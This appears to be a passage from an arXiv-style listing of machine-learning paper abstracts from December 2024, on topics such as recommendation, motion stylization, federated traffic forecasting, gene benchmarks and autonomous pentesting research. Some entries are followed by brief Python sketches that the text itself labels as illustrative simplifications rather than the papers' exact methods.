We propose utilizing background operators for mathematical reasoning in large language models (LLMs). To achieve this, we define a set of fundamental mathematical predicates as the basic building blocks. For each mathematical problem, we develop a Prolog solution that includes problem-specific predicates and intermediate predicates derived from these background operators, ensuring that each solution adheres to the defined operator set. We introduce the MATH-Prolog corpus, which is derived from the counting and probability categories of the MATH corpus. For efficient data augmentation, we apply K-fold cross-validated self-training. This method incrementally generates new Prolog solutions for each fold, incorporating those verified as correct into the training set throughout the model training process. Our experimental results demonstrate that 5-fold cross-validated self-training effectively identifies new, accurate Prolog solutions, achieving an accuracy of 84.6% on the cross-validated set and 84.8% on the test set during fine-tuning of the Meta-Llama-3.1-8B-Instruct model. This approach successfully uncovers new solutions with fully computable inference steps for previously unseen problems. Additionally, incorporating the background mathematical predicates into the prompt enhances solution coverage.
Updated: 2024-12-05 12:24:54
Categories: cs.AI
Pre-train, Align, and Disentangle: Empowering Sequential Recommendation with Large Language Models
Sequential recommendation (SR) aims to model the sequential dependencies in users' historical interactions to better capture their evolving interests. However, existing SR approaches primarily rely on collaborative data, which leads to limitations such as the cold-start problem and sub-optimal performance. Meanwhile, despite the success of large language models (LLMs), their application in industrial recommender systems is hindered by high inference latency, inability to capture all distribution statistics, and catastrophic forgetting. To this end, we propose a novel Pre-train, Align, and Disentangle (PAD) paradigm to empower recommendation models with LLMs. Specifically, we first pre-train both the SR and LLM models to get collaborative and textual embeddings. Next, a characteristic recommendation-anchored alignment loss is proposed using multi-kernel maximum mean discrepancy with Gaussian kernels. Finally, a triple-experts architecture, consisting of aligned and modality-specific experts with disentangled embeddings, is fine-tuned in a frequency-aware manner. Experiments conducted on three public datasets demonstrate the effectiveness of PAD, showing significant improvements and compatibility with various SR backbone models, especially on cold items. The implementation code and datasets will be publicly available.
Updated: 2024-12-05 12:17:56
Categories: cs.IR,cs.AI
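The alignment loss can be illustrated with a multi-kernel maximum mean discrepancy between the two embedding spaces. The bandwidths and the biased estimator below are illustrative assumptions rather than PAD's exact loss.

```python
import torch

def multi_kernel_mmd(x: torch.Tensor, y: torch.Tensor,
                     sigmas=(1.0, 2.0, 4.0, 8.0)) -> torch.Tensor:
    """Biased MMD^2 estimate between two embedding batches using a sum of
    Gaussian kernels, usable as an alignment loss.
    x: collaborative embeddings (N, D); y: LLM text embeddings (M, D)."""
    def kernel(a, b):
        d2 = torch.cdist(a, b).pow(2)  # pairwise squared distances
        return sum(torch.exp(-d2 / (2 * s**2)) for s in sigmas)
    return kernel(x, x).mean() + kernel(y, y).mean() - 2 * kernel(x, y).mean()
```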
Missing Melodies: AI Music Generation and its "Nearly" Complete Omission of the Global South
Recent advances in generative AI have sparked renewed interest and expanded possibilities for music generation. However, the performance and versatility of these systems across musical genres are heavily influenced by the availability of training data. We conducted an extensive analysis of over one million hours of audio datasets used in AI music generation research and manually reviewed more than 200 papers from eleven prominent AI and music conferences and organizations (AAAI, ACM, EUSIPCO, EURASIP, ICASSP, ICML, IJCAI, ISMIR, NeurIPS, NIME, SMC) to identify a critical gap in the fair representation and inclusion of the musical genres of the Global South in AI research. Our findings reveal a stark imbalance: approximately 86% of the total dataset hours and over 93% of researchers focus primarily on music from the Global North. However, while around 40% of these datasets include some form of non-Western music, genres from the Global South account for only 14.6% of the data. Furthermore, approximately 51% of the papers surveyed concentrate on symbolic music generation, a method that often fails to capture the cultural nuances inherent in music from regions such as South Asia, the Middle East, and Africa. As AI increasingly shapes the creation and dissemination of music, the significant underrepresentation of music genres in datasets and research presents a serious threat to global musical diversity. We also propose some important steps to mitigate these risks and foster a more inclusive future for AI-driven music generation.
Updated: 2024-12-05 12:10:42
Categories: cs.SD,cs.AI,cs.CL,cs.LG,eess.AS
D-LORD for Motion Stylization
This paper introduces a novel framework named D-LORD (Double Latent Optimization for Representation Disentanglement), which is designed for motion stylization (motion style transfer and motion retargeting). The primary objective of this framework is to separate the class and content information from a given motion sequence using a data-driven latent optimization approach. Here, class refers to person-specific style, such as a particular emotion or an individual's identity, while content relates to the style-agnostic aspect of an action, such as walking or jumping, as universally understood concepts. The key advantage of D-LORD is its ability to perform style transfer without needing paired motion data. Instead, it utilizes class and content labels during the latent optimization process. By disentangling the representation, the framework enables the transformation of one motion sequence's style to another's using Adaptive Instance Normalization. The proposed D-LORD framework is designed with a focus on generalization, allowing it to handle different class and content labels for various applications. Additionally, it can generate diverse motion sequences when specific class and content labels are provided. The framework's efficacy is demonstrated through experimentation on three datasets: the CMU XIA dataset for motion style transfer, the MHAD dataset, and the RRIS Ability dataset for motion retargeting. Notably, this paper presents the first generalized framework for motion style transfer and motion retargeting, showcasing its potential contributions in this area.
Updated: 2024-12-05 12:03:02
Categories: cs.CV,cs.AI
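Style transfer via Adaptive Instance Normalization boils down to replacing the per-channel statistics of the content features with those of the style features. Below is a standard sketch, assuming (batch, channels, time) motion feature tensors; the shapes are an assumption, not D-LORD's exact interface.

```python
import torch

def adaptive_instance_norm(content: torch.Tensor, style: torch.Tensor,
                           eps: float = 1e-5) -> torch.Tensor:
    """AdaIN over (B, C, T) feature tensors: normalize the content features
    per channel, then re-scale and shift them with the style's statistics."""
    c_mean = content.mean(dim=2, keepdim=True)
    c_std = content.std(dim=2, keepdim=True) + eps
    s_mean = style.mean(dim=2, keepdim=True)
    s_std = style.std(dim=2, keepdim=True)
    return s_std * (content - c_mean) / c_std + s_mean
```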
HyperFLINT: Hypernetwork-based Flow Estimation and Temporal Interpolation for Scientific Ensemble Visualization
We present HyperFLINT (Hypernetwork-based FLow estimation and temporal INTerpolation), a novel deep learning-based approach for estimating flow fields, temporally interpolating scalar fields, and facilitating parameter space exploration in spatio-temporal scientific ensemble data. This work addresses the critical need to explicitly incorporate ensemble parameters into the learning process, as traditional methods often neglect these, limiting their ability to adapt to diverse simulation settings and provide meaningful insights into the data dynamics. HyperFLINT introduces a hypernetwork to account for simulation parameters, enabling it to generate accurate interpolations and flow fields for each timestep by dynamically adapting to varying conditions, thereby outperforming existing parameter-agnostic approaches. The architecture features modular neural blocks with convolutional and deconvolutional layers, supported by a hypernetwork that generates weights for the main network, allowing the model to better capture intricate simulation dynamics. A series of experiments demonstrates HyperFLINT's significantly improved performance in flow field estimation and temporal interpolation, as well as its potential in enabling parameter space exploration, offering valuable insights into complex scientific ensembles.
Updated: 2024-12-05 12:01:20
Categories: cs.CV,cs.GR,cs.LG
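The core hypernetwork mechanism can be sketched as a small MLP that maps simulation parameters to the kernel of a convolution in the main network, so the layer adapts to each ensemble member. Everything below (sizes, the single generated layer) is an illustrative simplification of the full architecture.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class HyperConv(nn.Module):
    """A conv layer whose kernel is generated from simulation parameters."""
    def __init__(self, n_params: int, in_ch: int, out_ch: int, k: int = 3):
        super().__init__()
        self.shape = (out_ch, in_ch, k, k)
        n_weights = out_ch * in_ch * k * k
        # The hypernetwork: ensemble parameters -> main-network weights.
        self.hyper = nn.Sequential(
            nn.Linear(n_params, 64), nn.ReLU(), nn.Linear(64, n_weights)
        )

    def forward(self, x: torch.Tensor, sim_params: torch.Tensor) -> torch.Tensor:
        w = self.hyper(sim_params).view(self.shape)
        return F.conv2d(x, w, padding=self.shape[-1] // 2)

# Usage: the same layer produces different filters for different ensemble members.
layer = HyperConv(n_params=4, in_ch=2, out_ch=8)
out = layer(torch.randn(1, 2, 32, 32), torch.randn(4))
```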
Benchmarking Foundation Models on Exceptional Cases: Dataset Creation and Validation
Foundation models (FMs) have achieved significant success across various tasks, leading to research on benchmarks for reasoning abilities. However, there is a lack of studies on FMs performance in exceptional scenarios, which we define as out-of-distribution (OOD) reasoning tasks. This paper is the first to address these cases, developing a novel dataset for evaluation of FMs across multiple modalities, including graphic novels, calligraphy, news articles, and lyrics. It includes tasks for instance classification, character recognition, token prediction, and text generation. The paper also proposes prompt engineering techniques like Chain-of-Thought (CoT) and CoT+Few-Shot to enhance performance. Validation of FMs using various methods revealed improvements. The code repository is accessible at: https://github.com/MLAI-Yonsei/ExceptionalBenchmark
Updated: 2024-12-05 11:58:07
Categories: cs.AI
Practical Considerations for Agentic LLM Systems
As the strength of Large Language Models (LLMs) has grown over recent years, so too has interest in their use as the underlying models for autonomous agents. Although LLMs demonstrate emergent abilities and broad expertise across natural language domains, their inherent unpredictability makes the implementation of LLM agents challenging, resulting in a gap between related research and the real-world implementation of such systems. To bridge this gap, this paper frames actionable insights and considerations from the research community in the context of established application paradigms to enable the construction and facilitate the informed deployment of robust LLM agents. Namely, we position relevant research findings into four broad categories--Planning, Memory, Tools, and Control Flow--based on common practices in application-focused literature and highlight practical considerations to make when designing agentic LLMs for real-world applications, such as handling stochasticity and managing resources efficiently. While we do not conduct empirical evaluations, we do provide the necessary background for discussing critical aspects of agentic LLM designs, both in academia and industry.
Updated: 2024-12-05 11:57:49
Categories: cs.AI
PePR: Performance Per Resource Unit as a Metric to Promote Small-Scale Deep Learning in Medical Image Analysis
The recent advances in deep learning (DL) have been accelerated by access to large-scale data and compute. These large-scale resources have been used to train progressively larger models which are resource intensive in terms of compute, data, energy, and carbon emissions. These costs are becoming a new type of entry barrier to researchers and practitioners with limited access to resources at such scale, particularly in the Global South. In this work, we take a comprehensive look at the landscape of existing DL models for medical image analysis tasks and demonstrate their usefulness in settings where resources are limited. To account for the resource consumption of DL models, we introduce a novel measure to estimate the performance per resource unit, which we call the PePR score. Using a diverse family of 131 unique DL architectures (spanning 1M to 130M trainable parameters) and three medical image datasets, we capture trends about the performance-resource trade-offs. In applications like medical image analysis, we argue that small-scale, specialized models are better than striving for large-scale models. Furthermore, we show that using existing pretrained models that are fine-tuned on new data can significantly reduce the computational resources and data required compared to training models from scratch. We hope this work will encourage the community to focus on improving AI equity by developing methods and models with smaller resource footprints.
Updated: 2024-12-05 11:57:19
Categories: cs.LG,cs.AI,stat.ML
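The abstract defines PePR only as performance per resource unit; absent the exact formula, here is one hedged way such a score could be computed. The normalization below is purely an assumption for illustration and is not the paper's definition.

```python
def pepr_score(performance: float, resource_cost: float, max_cost: float) -> float:
    """Illustrative performance-per-resource score: reward models that trade
    little performance for a much smaller footprint. Assumes performance in
    [0, 1] and a resource cost (e.g., energy or parameter count) normalized
    by the most expensive model under comparison."""
    return performance / (1.0 + resource_cost / max_cost)

# Toy comparison: a 5M-parameter model at 80% accuracy vs. a 130M-parameter
# model at 84% accuracy.
small = pepr_score(performance=0.80, resource_cost=5.0, max_cost=130.0)
large = pepr_score(performance=0.84, resource_cost=130.0, max_cost=130.0)
print(f"small: {small:.3f}, large: {large:.3f}")  # the small model scores higher
```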
What should a neuron aim for? Designing local objective functions based on information theory
In modern deep neural networks, the learning dynamics of the individual neurons is often obscure, as the networks are trained via global optimization. Conversely, biological systems build on self-organized, local learning, achieving robustness and efficiency with limited global information. We here show how self-organization between individual artificial neurons can be achieved by designing abstract bio-inspired local learning goals. These goals are parameterized using a recent extension of information theory, Partial Information Decomposition (PID), which decomposes the information that a set of information sources holds about an outcome into unique, redundant and synergistic contributions. Our framework enables neurons to locally shape the integration of information from various input classes, i.e. feedforward, feedback, and lateral, by selecting which of the three inputs should contribute uniquely, redundantly or synergistically to the output. This selection is expressed as a weighted sum of PID terms, which, for a given problem, can be directly derived from intuitive reasoning or via numerical optimization, offering a window into understanding task-relevant local information processing. Achieving neuron-level interpretability while enabling strong performance using local learning, our work advances a principled information-theoretic foundation for local learning strategies.
Updated: 2024-12-05 11:50:40
Categories: cs.IT,cs.LG,cs.NE,math.IT
Learning on Model Weights using Tree Experts
The increasing availability of public models begs the question: can we train neural networks that use other networks as input? Such models allow us to study different aspects of a given neural network, for example, determining the categories in a model's training dataset. However, machine learning on model weights is challenging as they often exhibit significant variation unrelated to the models' semantic properties (nuisance variation). Here, we identify a key property of real-world models: most public models belong to a small set of Model Trees, where all models within a tree are fine-tuned from a common ancestor (e.g., a foundation model). Importantly, we find that within each tree there is less nuisance variation between models. Concretely, while learning across Model Trees requires complex architectures, even a linear classifier trained on a single model layer often works within trees. While effective, these linear classifiers are computationally expensive, especially when dealing with larger models that have many parameters. To address this, we introduce Probing Experts (ProbeX), a theoretically motivated and lightweight method. Notably, ProbeX is the first probing method specifically designed to learn from the weights of a single hidden model layer. We demonstrate the effectiveness of ProbeX by predicting the categories in a model's training dataset based only on its weights. Excitingly, ProbeX can also map the weights of Stable Diffusion into a shared weight-language embedding space, enabling zero-shot model classification.
Updated: 2024-12-05 11:50:24
Domains: cs.LG,cs.CV
BodyMetric: Evaluating the Realism of Human Bodies in Text-to-Image Generation
Accurately generating images of human bodies from text remains a challenging problem for state-of-the-art text-to-image models. Commonly observed body-related artifacts include extra or missing limbs, unrealistic poses, blurred body parts, etc. Currently, evaluation of such artifacts relies heavily on time-consuming human judgments, limiting the ability to benchmark models at scale. We address this by proposing BodyMetric, a learnable metric that predicts body realism in images. BodyMetric is trained on realism labels and multi-modal signals including 3D body representations inferred from the input image, and textual descriptions. In order to facilitate this approach, we design an annotation pipeline to collect expert ratings on human body realism, leading to a new dataset for this task, namely, BodyRealism. Ablation studies support our architectural choices for BodyMetric and the importance of leveraging a 3D human body prior in capturing body-related artifacts in 2D images. In comparison to concurrent metrics which evaluate general user preference in images, BodyMetric specifically reflects body-related artifacts. We demonstrate the utility of BodyMetric through applications that were previously infeasible at scale. In particular, we use BodyMetric to benchmark the ability of text-to-image models to produce realistic human bodies. We also demonstrate the effectiveness of BodyMetric in ranking generated images based on the predicted realism scores.
Updated: 2024-12-05 11:48:54
Domains: cs.CV,cs.AI
Words in Motion: Extracting Interpretable Control Vectors for Motion Transformers
Transformer-based models generate hidden states that are difficult to interpret. In this work, we aim to interpret these hidden states and control them at inference, with a focus on motion forecasting. We use linear probes to measure neural collapse towards interpretable motion features in hidden states. High probing accuracy implies meaningful directions and distances between hidden states of opposing features, which we use to fit interpretable control vectors for activation steering at inference. To optimize our control vectors, we use sparse autoencoders with fully-connected, convolutional, and MLP-Mixer layers and various activation functions. Notably, we show that enforcing sparsity in hidden states leads to a more linear relationship between control vector temperatures and forecasts. Our approach enables mechanistic interpretability and zero-shot generalization to unseen dataset characteristics with negligible computational overhead. Our implementation is available at https://github.com/kit-mrt/future-motion
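A minimal sketch of the control-vector idea, assuming the common difference-of-means construction (the paper fits its vectors from linear-probe directions and refines them with sparse autoencoders, which this omits):

```python
import numpy as np

# Hidden states for two opposing motion features (e.g., "fast" vs "slow"),
# shape (num_samples, hidden_dim); random stand-ins for real activations.
rng = np.random.default_rng(0)
h_fast = rng.normal(0.5, 1.0, size=(128, 256))
h_slow = rng.normal(-0.5, 1.0, size=(128, 256))

# One simple control vector: difference of class means, normalized.
v = h_fast.mean(axis=0) - h_slow.mean(axis=0)
v /= np.linalg.norm(v)

def steer(hidden, v, temperature):
    """Shift a hidden state along the control direction at inference."""
    return hidden + temperature * v

h = rng.normal(size=256)
h_steered = steer(h, v, temperature=2.0)  # nudges the forecast "faster"
```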
Updated: 2024-12-05 11:47:49
Domains: cs.LG,cs.CL,cs.CV
Learnable Similarity and Dissimilarity Guided Symmetric Non-Negative Matrix Factorization
Symmetric nonnegative matrix factorization (SymNMF) is a powerful tool for clustering, which typically uses the $k$-nearest neighbor ($k$-NN) method to construct the similarity matrix. However, $k$-NN may mislead clustering since the neighbors may belong to different clusters, and its reliability generally decreases as $k$ grows. In this paper, we construct the similarity matrix as a weighted $k$-NN graph with learnable weights that reflect the reliability of each $k$-th NN. This approach reduces the search space of the similarity matrix learning to $n - 1$ dimensions, as opposed to the $\mathcal{O}(n^2)$ dimensions of existing methods, where $n$ represents the number of samples. Moreover, to obtain a discriminative similarity matrix, we introduce a dissimilarity matrix with a dual structure of the similarity matrix, and propose a new form of orthogonality regularization with discussions on its geometric interpretation and numerical stability. An efficient alternating optimization algorithm is designed to solve the proposed model, with a theoretical guarantee that the variables converge to a stationary point satisfying the KKT conditions. The advantage of the proposed model is demonstrated by comparison with nine state-of-the-art clustering methods on eight datasets. The code is available at \url{https://github.com/lwl-learning/LSDGSymNMF}.
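A small Python sketch of a weighted $k$-NN similarity with one weight per neighbor rank, which is where the $(n-1)$-dimensional search space comes from. The decaying weights below are a stand-in; in the paper they are learned jointly with the factorization.

```python
import numpy as np

def weighted_knn_similarity(X, w):
    """Similarity as a weighted k-NN graph: w[k] is the (learnable)
    weight of each point's (k+1)-th nearest neighbor, so the whole
    similarity is parameterized by n-1 values instead of O(n^2)."""
    n = X.shape[0]
    d = np.linalg.norm(X[:, None] - X[None, :], axis=-1)
    np.fill_diagonal(d, np.inf)            # exclude self-neighbors
    order = np.argsort(d, axis=1)          # neighbors by increasing distance
    S = np.zeros((n, n))
    for i in range(n):
        for k in range(len(w)):
            S[i, order[i, k]] = w[k]
    return (S + S.T) / 2                   # symmetrize for SymNMF

X = np.random.default_rng(0).normal(size=(50, 4))
w = np.exp(-np.arange(49) / 5.0)           # decaying reliability per rank
S = weighted_knn_similarity(X, w)
```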
Updated: 2024-12-05 11:32:53
Domains: cs.LG
Federated Learning in Mobile Networks: A Comprehensive Case Study on Traffic Forecasting
The increasing demand for efficient resource allocation in mobile networks has catalyzed the exploration of innovative solutions that could enhance real-time cellular traffic prediction. Under these circumstances, federated learning (FL) stands out as a distributed and privacy-preserving solution to foster collaboration among different sites, thus enabling responsive near-the-edge solutions. In this paper, we comprehensively study the potential benefits of FL in telecommunications through a case study on federated traffic forecasting using real-world data from base stations (BSs) in Barcelona (Spain). Our study encompasses relevant aspects of the federated experience, including model aggregation techniques, outlier management, the impact of individual clients, personalized learning, and the integration of exogenous data sources. The evaluation is based on both prediction accuracy and sustainability, showcasing the environmental impact of the employed FL algorithms in various settings. The findings from our study highlight FL as a promising and robust solution for mobile traffic prediction, emphasizing its twin merits as a privacy-conscious and environmentally sustainable approach, while also demonstrating its capability to overcome data heterogeneity and ensure high-quality predictions, marking a significant stride towards its integration in mobile traffic management systems.
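For reference, the canonical FedAvg aggregation that such a study typically starts from looks like this minimal sketch (the tensor shapes and per-client sample counts are toy values):

```python
import numpy as np

def fedavg(client_weights, client_sizes):
    """Weighted average of client model parameters (FedAvg), the
    standard baseline among the aggregation techniques compared."""
    total = sum(client_sizes)
    return [
        sum(w[i] * (s / total) for w, s in zip(client_weights, client_sizes))
        for i in range(len(client_weights[0]))
    ]

# Three base stations, each holding a two-tensor model (toy shapes).
rng = np.random.default_rng(0)
clients = [[rng.normal(size=(8, 4)), rng.normal(size=4)] for _ in range(3)]
sizes = [1200, 800, 500]            # training samples per base station
global_model = fedavg(clients, sizes)
```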
Updated: 2024-12-05 11:32:14
Domains: cs.LG,cs.AI
VGGHeads: 3D Multi Head Alignment with a Large-Scale Synthetic Dataset
Human head detection, keypoint estimation, and 3D head model fitting are essential tasks with many applications. However, traditional real-world datasets often suffer from bias, privacy, and ethical concerns, and they have been recorded in laboratory environments, which makes it difficult for trained models to generalize. Here, we introduce VGGHeads -- a large-scale synthetic dataset generated with diffusion models for human head detection and 3D mesh estimation. Our dataset comprises over 1 million high-resolution images, each annotated with detailed 3D head meshes, facial landmarks, and bounding boxes. Using this dataset, we introduce a new model architecture capable of simultaneous head detection and head mesh reconstruction from a single image in a single step. Through extensive experimental evaluations, we demonstrate that models trained on our synthetic data achieve strong performance on real images. Furthermore, the versatility of our dataset makes it applicable across a broad spectrum of tasks, offering a general and comprehensive representation of human heads.
Updated: 2024-12-05 11:29:56
Domains: cs.CV,cs.LG
Towards Generalizable Autonomous Penetration Testing via Domain Randomization and Meta-Reinforcement Learning
With increasing numbers of vulnerabilities exposed on the internet, autonomous penetration testing (pentesting) has emerged as a promising research area, and reinforcement learning (RL) is a natural fit for studying it. Previous research in RL-based autonomous pentesting mainly focused on enhancing agents' learning efficacy within abstract simulated training environments. It overlooked the applicability and generalization requirements of deploying agents' policies in real-world environments that differ substantially from their training settings. In contrast, for the first time, we shift focus to the pentesting agents' ability to generalize across unseen real environments. For this purpose, we propose a Generalizable Autonomous Pentesting framework (namely GAP) for training agents capable of drawing inferences from one environment to another -- a key requirement for the broad application of autonomous pentesting and a hallmark of human intelligence. GAP introduces a Real-to-Sim-to-Real pipeline with two key methods: domain randomization and meta-RL. Specifically, we are among the first to apply domain randomization in autonomous pentesting, and we propose a large language model-powered domain randomization method for synthetic environment generation. We further apply meta-RL to improve the agents' generalization ability in unseen environments by leveraging the synthetic environments. The combination of these two methods effectively bridges the generalization gap and improves policy adaptation performance. Experiments are conducted on various vulnerable virtual machines, with results showing that GAP can (a) enable policy learning in unknown real environments, (b) achieve zero-shot policy transfer in similar environments, and (c) realize rapid policy adaptation in dissimilar environments.
Updated: 2024-12-05 11:24:27
Domains: cs.LG,cs.CR
A Deep RL Approach on Task Placement and Scaling of Edge Resources for Cellular Vehicle-to-Network Service Provisioning
Cellular Vehicle-to-Everything (C-V2X) is currently at the forefront of the digital transformation of our society. By enabling vehicles to communicate with each other and with the traffic environment using cellular networks, we redefine transportation, improving road safety and transportation services, increasing the efficiency of vehicular traffic flows, and reducing environmental impact. To effectively facilitate the provisioning of Cellular Vehicle-to-Network (C-V2N) services, we tackle the interdependent problems of service task placement and scaling of edge resources. Specifically, we formulate the joint problem and prove that it is not computationally tractable. To address its complexity we propose Deep Hybrid Policy Gradient (DHPG), a new Deep Reinforcement Learning (DRL) approach that operates in hybrid action spaces, enabling holistic decision-making and enhancing overall performance. We evaluated the performance of DHPG using simulations with a real-world C-V2N traffic dataset, comparing it to several state-of-the-art (SoA) solutions. DHPG outperforms these solutions, meeting the $99^{th}$-percentile C-V2N service delay target while simultaneously optimizing the utilization of computing resources. Finally, a time complexity analysis is conducted to verify that the proposed approach can support real-time C-V2N services.
Updated: 2024-12-05 11:23:14
Domains: cs.AI,cs.MA,cs.NI
Transferring disentangled representations: bridging the gap between synthetic and real images
Developing meaningful and efficient representations that separate the fundamental structure of the data generation mechanism is crucial in representation learning. However, Disentangled Representation Learning has not fully shown its potential on real images, owing to correlated generative factors, limited resolution, and restricted access to ground-truth labels. Specifically on the latter, we investigate the possibility of leveraging synthetic data to learn general-purpose disentangled representations applicable to real data, discussing the effect of fine-tuning and what properties of disentanglement are preserved after the transfer. We provide an extensive empirical study to address these issues. In addition, we propose a new interpretable intervention-based metric to measure the quality of factor encoding in the representation. Our results indicate that some level of disentanglement, transferring a representation from synthetic to real data, is possible and effective.
Updated: 2024-12-05 11:21:16
Domains: cs.CV,cs.AI
Distance-Adaptive Quaternion Knowledge Graph Embedding with Bidirectional Rotation
A quaternion contains one real part and three imaginary parts, providing a more expressive hypercomplex space for learning knowledge graphs. Existing quaternion embedding models measure the plausibility of a triplet through either semantic matching or geometric distance scoring functions. However, it appears that semantic matching diminishes the separability of entities, while the distance scoring function weakens the semantics of entities. To address this issue, we propose a novel quaternion knowledge graph embedding model. Our model combines semantic matching with the entities' geometric distance to better measure the plausibility of triplets. Specifically, in the quaternion space, we perform a right rotation on the head entity and a reverse rotation on the tail entity to learn rich semantic features. Then, we utilize distance-adaptive translations to learn the geometric distance between entities. Furthermore, we provide mathematical proofs to demonstrate that our model can handle complex logical relationships. Extensive experimental results and analyses show our model significantly outperforms previous models on well-known knowledge graph completion benchmark datasets. Our code is available at https://github.com/llqy123/DaBR.
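The Hamilton product underlying quaternion rotation is standard; a toy sketch of rotating the head and tail entities in opposite directions and combining a semantic-match term with a distance term might look as follows. The exact scoring function and the distance-adaptive translation are simplified away here.

```python
import numpy as np

def hamilton(p, q):
    """Hamilton product of two quaternions (a, b, c, d)."""
    a1, b1, c1, d1 = p
    a2, b2, c2, d2 = q
    return np.array([
        a1*a2 - b1*b2 - c1*c2 - d1*d2,
        a1*b2 + b1*a2 + c1*d2 - d1*c2,
        a1*c2 - b1*d2 + c1*a2 + d1*b2,
        a1*d2 + b1*c2 - c1*b2 + d1*a2,
    ])

rng = np.random.default_rng(0)
h, r, t = rng.normal(size=(3, 4))          # head, relation, tail embeddings
r = r / np.linalg.norm(r)                  # unit quaternion acts as a rotation
r_conj = r * np.array([1, -1, -1, -1])     # conjugate reverses the rotation

h_rot = hamilton(h, r)                     # right rotation of the head
t_rot = hamilton(t, r_conj)                # reverse rotation of the tail
gamma = 0.5                                # illustrative balance term
score = np.dot(h_rot, t_rot) - gamma * np.linalg.norm(h_rot - t_rot)
```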
Updated: 2024-12-05 11:17:03
Domains: cs.LG
Does your model understand genes? A benchmark of gene properties for biological and text models
The application of deep learning methods, particularly foundation models, in biological research has surged in recent years. These models can be text-based or trained on underlying biological data, especially omics data of various types. However, comparing the performance of these models consistently has proven to be a challenge due to differences in training data and downstream tasks. To tackle this problem, we developed an architecture-agnostic benchmarking approach that, instead of evaluating the models directly, leverages entity representation vectors from each model and trains simple predictive models for each benchmarking task. This ensures that all types of models are evaluated using the same input and output types. Here we focus on gene properties collected from professionally curated bioinformatics databases. These gene properties are categorized into five major groups: genomic properties, regulatory functions, localization, biological processes, and protein properties. Overall, we define hundreds of tasks based on these databases, which include binary, multi-label, and multi-class classification tasks. We apply these benchmark tasks to evaluate expression-based models, large language models, protein language models, DNA-based models, and traditional baselines. Our findings suggest that text-based models and protein language models generally outperform expression-based models in genomic properties and regulatory functions tasks, whereas expression-based models demonstrate superior performance in localization tasks. These results should aid in the development of more informed artificial intelligence strategies for biological understanding and therapeutic discovery. To ensure the reproducibility and transparency of our findings, we have made the source code and benchmark data publicly accessible for further investigation and expansion at github.com/BiomedSciAI/gene-benchmark.
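The architecture-agnostic protocol reduces to a simple recipe: take one fixed embedding per gene from the model under test and fit the same lightweight predictor per task. A sketch with random stand-in embeddings and a binary property label:

```python
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

# Each evaluated model supplies one embedding per gene; the benchmark
# trains the same simple predictor on top for every task, so all models
# are compared through identical input and output types.
rng = np.random.default_rng(0)
gene_embeddings = rng.normal(size=(5000, 512))  # from the model under test
labels = rng.integers(0, 2, size=5000)          # e.g., a binary gene property

X_tr, X_te, y_tr, y_te = train_test_split(
    gene_embeddings, labels, random_state=0)
clf = LogisticRegression(max_iter=500).fit(X_tr, y_tr)
print("task score:", clf.score(X_te, y_te))     # per-task, per-model score
```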
Updated: 2024-12-05 11:14:01
Domains: cs.AI
Integrated Sensing and Communications for Low-Altitude Economy: A Deep Reinforcement Learning Approach
This paper studies an integrated sensing and communications (ISAC) system for low-altitude economy (LAE), where a ground base station (GBS) provides communication and navigation services for authorized unmanned aerial vehicles (UAVs), while sensing the low-altitude airspace to monitor the unauthorized mobile target. The expected communication sum-rate over a given flight period is maximized by jointly optimizing the beamforming at the GBS and UAVs' trajectories, subject to the constraints on the average signal-to-noise ratio requirement for sensing, the flight mission and collision avoidance of UAVs, as well as the maximum transmit power at the GBS. Typically, this is a sequential decision-making problem with the given flight mission. Thus, we transform it to a specific Markov decision process (MDP) model called episode task. Based on this modeling, we propose a novel LAE-oriented ISAC scheme, referred to as Deep LAE-ISAC (DeepLSC), by leveraging the deep reinforcement learning (DRL) technique. In DeepLSC, a reward function and a new action selection policy termed constrained noise-exploration policy are judiciously designed to fulfill various constraints. To enable efficient learning in episode tasks, we develop a hierarchical experience replay mechanism, where the gist is to employ all experiences generated within each episode to jointly train the neural network. Besides, to enhance the convergence speed of DeepLSC, a symmetric experience augmentation mechanism, which simultaneously permutes the indexes of all variables to enrich available experience sets, is proposed. Simulation results demonstrate that compared with benchmarks, DeepLSC yields a higher sum-rate while meeting the preset constraints, achieves faster convergence, and is more robust against different settings.
Updated: 2024-12-05 11:12:46
Domains: cs.NI,cs.LG
Boundary-Guided Learning for Gene Expression Prediction in Spatial Transcriptomics
Spatial transcriptomics (ST) has emerged as an advanced technology that provides spatial context to gene expression. Recently, deep learning-based methods have shown the capability to predict gene expression from whole slide image (WSI) data using ST data. Existing approaches typically extract features from images and the neighboring regions using pretrained models, and then develop methods to fuse this information to generate the final output. However, these methods often fail to account for cellular structure similarity, cellular density, and the interactions within the microenvironment. In this paper, we propose a framework named BG-TRIPLEX, which leverages boundary information extracted from pathological images as guiding features to enhance gene expression prediction from WSIs. Specifically, our model consists of three branches: the spot, in-context and global branches. In the spot and in-context branches, boundary information, including edge and nuclei characteristics, is extracted using pretrained models. These boundary features guide the learning of cellular morphology and the characteristics of the microenvironment through Multi-Head Cross-Attention. Finally, these features are integrated with global features to predict the final output. Extensive experiments were conducted on three public ST datasets. The results demonstrate that our BG-TRIPLEX consistently outperforms existing methods in terms of Pearson Correlation Coefficient (PCC). This method highlights the crucial role of boundary features in understanding the complex interactions between WSIs and gene expression, offering a promising direction for future research.
Updated: 2024-12-05 11:09:11
Domains: cs.LG
ProtDAT: A Unified Framework for Protein Sequence Design from Any Protein Text Description
Protein design has become a critical method for advancing a wide range of applications such as drug development and enzyme engineering. However, protein design methods that rely on large language models with only pretraining and fine-tuning struggle to capture relationships in multi-modal protein data. To address this, we propose ProtDAT, a de novo fine-grained framework capable of designing proteins from any descriptive protein text input. ProtDAT builds upon the inherent characteristics of protein data to unify sequences and text as a cohesive whole rather than separate entities. It leverages an innovative multi-modal cross-attention mechanism, integrating protein sequences and textual information at a foundational level for seamless integration. Experimental results demonstrate that ProtDAT achieves state-of-the-art performance in protein sequence generation, excelling in rationality, functionality, structural similarity, and validity. On 20,000 text-sequence pairs from Swiss-Prot, it improves pLDDT by 6%, TM-score by 0.26, and reduces RMSD by 1.2 Å, highlighting its potential to advance protein design.
Updated: 2024-12-05 11:05:46
Domains: cs.AI
Automated Medical Report Generation for ECG Data: Bridging Medical Text and Signal Processing with Deep Learning
